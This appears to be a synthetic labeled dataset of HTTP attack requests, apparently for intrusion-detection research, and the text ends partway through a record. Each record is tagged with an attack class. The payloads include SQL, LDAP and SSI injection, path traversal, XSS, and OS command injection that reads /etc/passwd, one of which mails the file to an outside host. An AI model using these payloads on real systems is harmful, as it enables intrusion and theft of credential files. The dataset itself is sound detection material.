Warning: 472 www.eceaeEyo.jpeg "eeepnapsIioetNwi" 
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

oh=noH&rrhpSf0i=21&rEatobaitpexs=uI@k9Y@Bu&scmne=temconnectrHOT ti&ata5o=4472&iiOtrau=77&0R5p0oii=<!--   #exec   cmd="/bin/mail eyht.com   <     /etc/passwd"-->

End - Id: 39907
Start - Id: 44687
class: PathTransversal
POST /XWfAQz/h1zYLfXIjbBMn6Vu6/tts/On3jdocumentGGqGcmd0/60nnhoyisle/SwHVUR.htm? HTTP/1.0
Content-Length: 84
Content-Language: o,e
Content-Encoding: gzip
Content-Location: http://www.dcxm2e.cz/ucNb7a/isheiNs.doc
Content-MD5: ZFplZjdyYWFFb3V1YWxncg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 24:29:54 GMT
Last-Modified: Wed, 01 Aug 07 15:45:45 CET
Host: www.eiaow.cz:80
Connection: close
Accept: video/quicktime;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 113.128.122.99
Cookie: bmglfmUhnlI=erDD3;hitcsAwRhye=Dtn4j fg;wzisati73p4gsr=38231755
Cookie2: $Version="657"
Date: Sun, 16 Oct 05 02:00:08 UTC
Expect: 100-continue
From: nC0otao@cuVsd.gov
If-Modified-Since: Wed, 02 Jan 08 01:23:29 CET
If-Unmodified-Since: Mon, 12 Apr 10 01:01:59 UTC
If-Match: *
If-None-Match: "dr7q60SUwfpocpkYSr6"
If-Range: *
Max-Forwards: 4
Pragma: no-cache
Authorization: Digest nc=F2bf69C0
Range: 2168-,8-1607,73-
Referer: /essne/7nome9b/gdlsfAh/did1n.swf
TE: trailers,gzip,deflate
Trailer: Connection
User-Agent: Mozilla/8.7 (X11; U; Linux i386 1.4; tm-ie; rv:9.2.3) Gecko/08723853
UA-CPU: StrongARM
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 562x3540
Via: hanpe/3.4 www.nFerirey.html, Ahi/0.3 231.207.250.1
Transfer-Encoding: identity
Upgrade: 2dgtes/0.6
Warning: 868 www.gmor.js "Hn5xrhit" 
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: ------------------------

4R9Heufurtvit2=/./../../.././../.././../.././../../../

End - Id: 44687
Start - Id: 35269
class: SqlInjection
GET /euaie6/cesot9atsn8croio/epbr3qet/n0gbOeNrp2Hf4FIaUu9/nCVotZmQSxYIFHPe7X/ec550Zs6_.asmx?nohi0sbrcno=2oarqkenhehFnt&aDlogR7cJ=7384&PNlYRopta=OR+%27ne%27+++LIKE+%27Sim%25%27&ossepeytpm=2531&ihedoosntaer=WestfaO6egl&ofsrOt7=36&eP3=znot HTTP/1.1
Host: 48.229.73.96:80
Connection: e0utsoeD
Accept: */*
Accept-Charset: macintosh
Accept-Encoding: compress;q=0.1, deflate, deflate, deflate
Accept-Language: ht7j2t6Y-5ceteT, niN1O-lgAnokgi;q=0.0, lirsd-t;q=0.4
Cache-Control: no-store
Client-ip: 155.132.155.102
Cookie: seherm0=tooee48;Tniiinm=nynqscp:4l;b=aed9;lcarDao=nn;as=ssttaaFcEruyiw;iV=yEn
Cookie2: $Version="87"
Date: Sat, 12 Apr 08 19:36:55 GMT
ETag: "bvEbhRuWJy1AnSCQb"
Expect: meahwq=liroah;ooftt
From: 3d2leleb@st6ttjrd.cz
If-Modified-Since: Wed, 13 Jan 10 14:17:18 UTC
If-Unmodified-Since: Tue, 08 Apr 08 17:22:25 CET
If-Match: *
If-None-Match: "1blDjOEEciyxGZ5iMbD-"
If-Range: Wed, 01 Sep 04 10:12:36 UTC
Max-Forwards: 9
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest nc=5dA9257d
Authorization: n7ouho 0tad=wpehygri
Range: 930-456,2355-
Referer: /ilaod/hiOrxoob/t6csnie/tketpw/dori2fl.php4
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (compatible; Konqueror/7.8; Linux i586; Osnn5nyiI; rnvehia)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/1.6 www.l4ebsode.jpeg:0039, FTP/3.0 14.121.231.100
Transfer-Encoding: deflate
Upgrade: o9e/7.6, Srr/2.4, rwihen/5.2, raoelr/6.2
Warning: 296 6.5.179.123 "hytu1eutoy" 
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 32650890830963017
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35269
Start - Id: 47913
class: XSS
GET /cwjrGyrkVPlmeV6L/szd700lh8s2/nniIleul.jpeg?s7iaoa1K=tfvbscriptonveetto%3Dt%3D&e51zI1I=019972&chltowE=%3Cimg+src++%3D+%22+mocha%3A%5Balert%28%27oteflpDMru%27%29%3B%5D+++++%22++++%3E&nif5rd8tngtIt=sAd&location6yH@dAperlPW=8l8fb+0%3Euusr%3Eoq+%24dd&180=o&ALijreip=openlocationy&eop=mentlhu9&T8OcUJ=sli3oixyhueocE8&ruTassscnar4t=3x&SJ3wn3gpB=roascriptNay2f HTTP/1.1
Host: 132.73.48.39
Connection: olustpw0
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, identity
Accept-Language: erwtb-i;q=0.4, Di-ooea, fb0oh-tao, aZd-n8t6;q=0.0
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: se=aued;dHenfamsebsnak=votstQytlmcna0;2eho7r=9471;itee=odrQ2-YX6K
Cookie2: $Version="6"
Date: Thu, 22 Jun 06 07:29:31 CET
ETag: W/"cJc-HCc20ZvA@@p"
Expect: IEds=yM0cnd;onix
From: 4ebutle@EleUossins.org
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:40:41 GMT
If-Match: "ldscn8jdl_d7As2SW"
If-None-Match: "kF-F9w5nbD2A0l1"
If-Range: Mon, 29 May 06 08:12:56 CET
Max-Forwards: 3
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest realm
Range: -419,3-
Referer: /qaenrsol/eniha/oCxin/stunx5/wiOaio.asmx
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 8.6; bl-ae; rv:4.8.9) Gecko/45931853
UA-CPU: Sparc
UA-Disp: 1161,524,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.8 www.lsffikew.jpeg, 1eefe/4.1 www.A89m.gif, HTTP/9.0 217.16.173.81
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47913
Start - Id: 41443
class: SqlInjection
POST /ueoar.aspx? HTTP/1.0
Content-Length: 170
Content-Language: gsm
Content-Encoding: identity
Content-Location: http://www.wuuoon.be/gufn0/st0n/b5gshsh.php4
Content-MD5: cmVuSHJ3aXNhZXZRcG1qdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Apr 05 01:12:15 UTC
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: 97.119.163.10
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 166.4.252.29
Cookie: wiandwsts=8997733;puAEljhet=p/NreplaceSeannso$mrg;ea5ti57dp=:olikesswr nupdatelto&ey;X3NMU=gnysn;esrnQ47wnAuuo=vLc;2y=osock_streama
Cookie2: $Version="9"
Date: Wed, 02 Jul 08 17:11:39 GMT
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Mon, 06 Apr 09 21:14:19 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: "hQHlhGNn.g4-JGb-j6"
If-None-Match: *
If-Range: "0IUH3NPlhheyaV1Rq"
Max-Forwards: 5
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest realm
Range: 78106-77620,1196-
Referer: /aseneY/ssop/lrawruoe/einh.conf
TE: deflate;q=0.2
Trailer: Date
User-Agent: euiSra4frt/3.0
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: compress
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 243.251.179.229
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wakfbig5a4=28&GY3N2CwN=8311602034&1enpba932teel=8xje&orHIPQsLn=u1qkRh@&h0shsaasmnaead=sd_K&s6lboeanee=311243&tslrDiS=qwer'  or bmEDczz_v.Account='9tr@bpacWa.com

End - Id: 41443
Start - Id: 37560
class: LdapInjection
PUT /s@24Qm.n42V.SFzC/32XBnVILGIH/sbv_.bin? HTTP/1.1
Content-Length: 107
Content-Language: thnfe
Content-Encoding: identity
Content-Location: http://dlosng0.gov/oicmdf4a/rdcear/tli1ggar/r6oTh/7eeho.pdf
Content-MD5: NWlDbm5ld244RWM3cGVsbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Apr 05 03:41:04 UTC
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: 173.227.141.30
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: itl-lut0ze
Cache-Control: no-cache
Client-ip: 229.190.23.163
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="0"
Date: Wed, 05 May 04 04:14:33 GMT
ETag: "CiFBiQN6uzs39biv-lXG"
Expect: liIlS
From: oenu@5hnawusete.de
If-Modified-Since: Thu, 14 Jan 10 05:27:36 UTC
If-Unmodified-Since: Tue, 02 Nov 04 05:12:08 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: *
If-Range: "_AseJXfQatMi_Gw7E6Tk"
Max-Forwards: 1055
MIME-Version: 9.9
Pragma: 0='tiziOm'
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: NTLM aWVubmxHb3JldmZSZ2lsMWlhTmhDbHNxaGk3ZGhhb0R1b2lvTDh4dnNjTk1lWW90
Range: -78728,9752-,0169-21
Referer: http://xbpnsooi.biz/sofThke/edticVr/unui7dzr.doc
TE: deflate
Trailer: If-None-Match
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 9.9; tr-ho; rv:4.6.9) Gecko/72533702
UA-CPU: PowerPC
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1680x065
Via: HTTP/1.9 8.76.113.134, 0.4 www.akmm8.tiff, HTTP/9.7 162.236.199.162
Transfer-Encoding: compress
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pUdyija=easrrtgroup by6rsy&ndroacrss=ul&sttSOgbeh=90237&liy=2&egqepa=)    (  |   (scaic=uiegz*)

End - Id: 37560
Start - Id: 41503
class: SqlInjection
PUT /OW/dWTS9ad_n0NOX/bOaednmrt/2LLqFe2eVtib6g2cw5SW/s@bowfDAHxjn9Sw./tHWVGDFYotYOKxfzc/aiolotjan/3MheAa/SSq@3n/h1nYpet.cgi? HTTP/1.0
Content-Length: 137
Content-Language: idosnnei
Content-Encoding: identity
Content-Location: /iBhAaarm/oqlA.wmn
Content-MD5: Y0Uyc1RkdWlpN2llbzNsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Jan 06 09:39:21 CET
Last-Modified: Thu, 09 Jul 09 05:52:17 GMT
Host: 36.160.24.36
Connection: keep-alive
Accept: text/*, video/quicktime;q=0.4, video/mpeg
Accept-Charset: iso-8859-7;q=0.5, macintosh;q=0.0, macintosh;q=0.8
Accept-Encoding: deflate;q=0.5, gzip, deflate, compress
Accept-Language: hbt-mh;q=0.3, 1-nm;q=0.7
Cache-Control: max-stale
Client-ip: 236.122.87.165
Cookie: vnediOeAtocwwes=860649;ccinsertz1B9bodyxSx=)2w 7ieNb ~
Cookie2: $Version="13"
Date: Fri, 17 Sep 04 14:56:26 UTC
ETag: W/"6wYRe7NHXfdKLFK"
Expect: maEbbf
From: dsdnen0@rs1ryqaaes.uk
If-Modified-Since: Wed, 28 Nov 07 14:09:53 CET
If-Unmodified-Since: Mon, 05 Jan 04 07:41:30 GMT
If-Match: "jS_@PhBQ.eTxcRurXC"
If-None-Match: *
If-Range: *
Max-Forwards: 0605
MIME-Version: 6.8
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 229-94,-0,-455
Referer: /i4EeatRk/lkleaa.mpg
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/1.4 (X11; U; Linux i586 3.0; ne-y7; rv:8.0.9) Gecko/47306840
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 0.8 www.uuteUZl.shtml, e3epcc/9.0 9.187.170.229
Transfer-Encoding: gzip
Upgrade: lhggir/5.4, ntth/4.3, nutltt/0.1, pt8/9.2
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Jwp-DhxeaD_=8546&tanam=eyiahehe&dc0dn='     or id    in (  select   *   from      user_db     )&lFbeahnhr=85239&Hcnleeu= hlg&3hnr= 

End - Id: 41503
Start - Id: 37014
class: LdapInjection
GET /oeICOMAg6hJGuGXH6/shbthn/ewtorbxveeea8retfruc/lcieie/znryeeetrlzhnabov/inqxGHGLWJ9.tiff?yec4rzsTue8=blsToee%3Ayservicesoryfnsv&hybtgeamrotifo=179147376&eailUvonthlisj=m0s6eznbin+%5CtEkt&WBKgrPikF=ernyn&Guf=94995949&Sh9ddilgihIc=si8as%29%28%26%28objectClass%3Dlt*%29&NieaMw=e5sf%40_&4Hife=1&eEesta=g4euncAehwvr0acJ0z&des64Nn2b5cyfh=NSr&Oece=nbidu0 HTTP/1.0
Host: www.Yqth8ixIm.uk
Connection: close
Accept: video/mpeg;q=0.4, video/mpeg, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 37.233.198.38
Cookie: yteitqhn=yh4ra
Cookie2: $Version="83"
Date: Sat, 03 Nov 07 05:25:34 UTC
ETag: W/"NrDtJo599z-_lb2P"
Expect: sUyt3Hn=odaE
From: ete2k@zfNl4.de
If-Modified-Since: Wed, 28 Feb 07 12:02:45 GMT
If-Unmodified-Since: Wed, 07 Apr 10 24:49:27 UTC
If-Match: "ExvSvmX_X8@Er-nV3-b"
If-None-Match: "7H4gI5pCf3_gBNjbksw"
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 0307
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Digest qop=sturyeN
Range: 11-,-9658
Referer: http://www.saelHi.uk/whrs9E/drake.dll
TE: trailers,gzip,trailers
Trailer: Cache-Control
User-Agent: edonsetasierzu9gserx
UA-CPU: StrongARM
UA-Disp: 435,7970,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2678x798
Via: 4.1 250.216.195.141, HTTP/6.2 204.180.199.55:66
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37014
Start - Id: 45757
class: PathTransversal
GET /TcanNmdizo/edtRPlisto/t3Mcl/bee/aesnldOtil1/ocnyaemjklttq6obobi/anoisafFf/fd7m.g/esvitzkBraslniqi.html?po_-gIvjQ=cd8T&toeo3=rtlmteanO38dmslt&b.SDT=aca6+hihcessv%2F&led=iwca7pepe&keLh=388&lpitiboosioubt7=6+hs+r+ym&0Epmdtdt3u=wdfyeBdir&cew=atIQtsF&hm5KG=7300364&bO=2&sso4qgsidig3cd=y7&tuo=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&rf=jZFC%40MI3z&tefn=3963156&uot7adli2gsee=9135246 HTTP/1.0
Host: www.oooar6u9gt.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mrAee-etdo, bicce-ha;q=0.1, nt9c661-9fiynn
Cache-Control: io='Oet'
Client-ip: 84.7.154.77
Cookie: topeNaOserega=l]i;i.nw9hs3=Ot'1h;aabsoita=lhdrtettlOityeTi;fi30sa=ixjRqkI;deser=ore
Cookie2: $Version="51"
Date: Tue, 29 Jan 08 14:59:03 UTC
ETag: "NdluKyEsbt3wqR6uNr"
Expect: aameaew
From: nbuYYe@rnspS.ch
If-Modified-Since: Wed, 20 Sep 06 16:30:13 UTC
If-Unmodified-Since: Tue, 16 May 06 15:02:59 UTC
If-Match: "7Iprad7Mc-o95V3"
If-None-Match: "0wyDUnO7Su37hLVaUyh"
If-Range: *
Max-Forwards: 876
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: powh Orrwo=yrnt5em
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /Anuy/nldimn.msf
TE: chunked,trailers,deflate;q=0.7
Trailer: From
User-Agent: yarebgao (2S54sFEc7; bNqIFydMqy; wOx93ddnW)
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x559
Via: FTP/1.5 72.252.178.74
Transfer-Encoding: 3Epmo
Upgrade: aGdne/3.3, slrmIL/7.0, hsea/2.9, wrhit/9.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 8409681186997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45757
Start - Id: 43112
class: OsCommanding
GET /oXMP2/bjoRuoi60u8ovQ/itgHio/qfdUelqitamatlf/nz2wK4_tYvIHS9PO/gbi6ulp.jpeg?oTtggdnraoampR=39367&oiza2zvenei=up&IeexecW=+++++%3B++echo++++%3B++w+++++%3B+uname+-a++%3B+++id&0chQmochai8r@X=90004&li=s1Zfpj&6arhNaunFdzjru=c9%40Fw4L&snedei=946113&otit7Et5ti6og=79601241&Tr=11 HTTP/1.0
Host: 159.161.55.14
Connection: close
Accept: text/plain
Accept-Charset: ks_c_5601-1987, euc-jp;q=0.0
Accept-Encoding: identity;q=0.0, identity, compress;q=0.6
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 107.157.218.192
Cookie: itisEbtohe=iBX9fbNh@m
Cookie2: $Version="389"
Date: Wed, 20 Jan 10 05:40:02 UTC
ETag: "WV@RnoNoblIi_WrxHi"
Expect: 100-continue
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Tue, 09 Oct 07 10:02:17 CET
If-Unmodified-Since: Fri, 18 May 07 02:08:26 GMT
If-Match: "DvI21gE0KqW.64h_"
If-None-Match: *
If-Range: "0TpZeFNLd1lmCS8-6wEC"
Max-Forwards: 4537
MIME-Version: 9.7
Pragma: ss='gh'
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: ebLw xtl4r=t6xue5
Referer: /s6rdWdn/mwd5ckt.sh
TE: deflate;q=0.7
Trailer: Connection
User-Agent: dpoCYo7zpv http://www.aa3louoe.st
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 603x2268
Via: 5.8 www.ndqgd.css, Teg/7.3 63.251.131.119
Transfer-Encoding: gzip
Upgrade: Fgohbd/4.1
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43112
Start - Id: 36703
class: OsCommanding
PUT /s9fOomVW4S4LuOK/8kI/k9JxfU/wheiarte/e@Q5XZ/lv/aeoomeu5gmctwi4rt9lz/hR/goEwhr/coPw0o@V_S7b4.aspx? HTTP/1.1
Content-Length: 141
Content-Language: t,iey
Content-Encoding: identity
Content-Location: /KHbei/estnt.bin
Content-MD5: NGhoYXdoaGl1aWhhaTlidA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 06:36:30 UTC
Last-Modified: Sun, 08 Nov 09 01:12:46 UTC
Host: www.oktonl3u5A.org
Connection: close
Accept: audio/*
Accept-Charset: iso-8859-4;q=0.0, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9987
Client-ip: 24.6.250.56
Cookie: gugctomseiOdozb=fnq%tmocha e ?ed;wvmbaoes7eeqy3=h0dathemocha~;mhsotnwthyr5ip=990099;K8inullN=7641
Cookie2: $Version="134"
Date: Sat, 15 Dec 07 22:33:46 GMT
ETag: W/"LE7CRa2rOJ_8Ht@xs8X"
Expect: 7oiToetn
From: 3l7rnoe@eln4.de
If-Modified-Since: Tue, 08 Jun 04 08:27:00 CET
If-Unmodified-Since: Mon, 24 Sep 07 15:44:56 GMT
If-Match: "36xnzueWE8q@hfH.yFXT"
If-Range: Tue, 09 Feb 10 24:01:39 UTC
Max-Forwards: 38
MIME-Version: 4.5
Pragma: hnon5s=d4o
Proxy-Authorization: ssrr uentet=otetm
Authorization: Digest nonce
Range: 426198-
Referer: /IOttjw/sah5l/6st29/nRLuid2/tutr.html
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: 8EupeoEeAa (xtFch3)
UA-CPU: StrongARM
UA-Disp: 1584,454,32
UA-Color: color32
UA-Pixels: 654x545
Via: 6.2 www.sp2ynr.js, 5.2 www.iieees.html
Transfer-Encoding: deflate
Upgrade: ebhmu/0.2, e37zho/7.1
X-Forwarded-For: 123.125.191.125
X-Serial-Number: 56753790065108318
----: -------------------------

tgv7hhziokdAuvh=aod@zo&80w3ZYW8fxI=rT&bCbetcee1E.53Q=bO&ynhrbovgzLiUn5t=Mue&pg0eehttps7WDmeta1=|  /bin/cat  /etc/passwd%00.html

End - Id: 36703
Start - Id: 42426
class: SqlInjection
GET /OtOaeseil/Nfaiolol/wkBIbkdybKhik9AF/y6j/anewwmhd5/5nhtv/vlinknxp_QIJL9hE/lq-x7gMwsXxAulkE9C/t1WxXH0Th6pCBVd/Ywfitbmoedt0eef/eeawctsoUo.mdb?NPA9g=%5Cuin&hHlla2yr1se=323761&ourginb=%26gfrom%3Bes%26&tw=6pnoaE&4._6=ionie&tlr6useerenf=%27+++%2F**%2F+OR++%2F**%2F+++++%27nrn%27++++%3E++%27S&eisow=4mfws&AexiEv=4arm%25N&eWu8trebtsbhfs=ln4h&hi4a=senbwinntm%26PnaeO%24Wr&owtiia=iBeEatw HTTP/1.1
Host: www.ctllejt.ch
Connection: maneh
Accept: application/postscript;q=0.8, text/plain
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7
Client-ip: 28.141.41.185
Cookie: hl=d2wteffl;9XP@M2J@cconnectW=oiyab;areh=Eenwn2zwsnrtwhsni
Cookie2: $Version="157"
Date: Tue, 05 Aug 08 07:35:15 UTC
ETag: W/"ROs81ENXsNKrraDFF"
Expect: ctja
From: Tm9x@je4xi.it
If-Modified-Since: Tue, 26 Aug 08 24:53:27 GMT
If-Unmodified-Since: Sat, 05 Sep 09 22:55:30 UTC
If-Match: *
If-None-Match: "f40tMj93HtJE1CnU9l2S"
If-Range: *
Max-Forwards: 32
MIME-Version: 0.1
Pragma: g1e6='im8ncre'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM QWVjdHRpUmU4cm9Mc3Zlc3RIZW9JZWYxM3N0bGVlbmdhYnNF
Range: 005696-6624,4-
Referer: /oa1ee.nsf
TE: gzip;q=0.9,chunked,deflate;q=0.6
Trailer: Trailer
User-Agent: Mozilla/2.1 (compatible; Konqueror/2.4; Solaris; rlaban)
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6539x2749
Via: 6.5 207.97.59.250:4611
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42426
Start - Id: 37668
class: LdapInjection
PUT /xterm_shtpass%uboot.iniGRF_fK6/etrto3nga3su/og/fqW0dS.F.DWeeWg/i33u/tihise1FsifoWm4Por/a4RC@RkECVQDPy5Bo/6QSI4oKC-Wa9W6.tiff? HTTP/1.1
Content-Length: 292
Content-Language: DtaEnqO
Content-Encoding: gzip
Content-Location: http://oyattka.biz/al4io1/n0y4s20.ace
Content-MD5: Nm04ZWlhc3RzdHRsaVR0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 03 Mar 07 04:17:17 UTC
Last-Modified: Sat, 03 Feb 07 08:15:25 UTC
Host: 8.181.158.154:6
Connection: isxu06la
Accept: audio/*, text/plain, text/plain
Accept-Charset: iso-8859-2;q=0.0, windows-874;q=0.9, windows-1250;q=0.0, x-mac-japanese
Accept-Encoding: 
Accept-Language: hds-rrM, tb-jeig;q=0.5, u-9n;q=0.0, kH-Edgse;q=0.8, gnrldn-lbz
Cache-Control: no-cache
Client-ip: 109.33.117.29
Cookie: oeiiodmql=jlbKZfPXZNM;RnwwffounngddOh=ieotytslls&tmlike4q ;a3NcA3h=ebOLn
Cookie2: $Version="729"
Date: Sun, 24 Sep 06 15:44:46 CET
ETag: "L1wKH0qc0h5OgNanY"
Expect: 100-continue
From: eavrng@Ual9isu.biz
If-Modified-Since: Sun, 09 Jan 05 05:01:11 CET
If-Unmodified-Since: Thu, 16 Dec 04 15:42:40 UTC
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Basic aGRraVRyZW46NTFzZQ==
Range: 7-75,773-,28-851
Referer: /ntndat/Eoensli.jpeg
TE: chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/3.2 (compatible; MSIE 6.5; Win 9x; er28oei; ltu5inH4hu)
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 2.1 2.34.100.72, HTTP/1.0 206.92.198.88, HTTP/0.9 22.236.122.79
Transfer-Encoding: deou
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 193.224.2.50
X-Serial-Number: 0737126851
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ts9=s&5RIhes89i=rsjr&gmpt=88445562&rpdamhygh=87&seer0eoz=Yaortatcresehtdefd&cnodetnt5DrH=3833&82ZU=)   (  |   (   cn=*o    'brien*    )(mail=*o'brien* ) &irs=5&8C8tDJTH=eH3ScG@-kr&tyEeye=ihr785teLni&ZUo684g=%t2bi oyh[do(j%too&pNojAYmO@w=3r|+&sttnee7=716460

End - Id: 37668
Start - Id: 41396
class: SqlInjection
POST /8d/0akQ.mdb? HTTP/1.1
Content-Length: 169
Content-Language: tj1M,ee,icn
Content-Encoding: gzip
Content-Location: /ffXite.php3
Content-MD5: YmZlcmlleGVydGllaHNjcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jun 07 09:07:08 GMT
Last-Modified: Sun, 30 Jan 05 04:57:39 UTC
Host: 91.159.33.117:80
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: v8='ote'
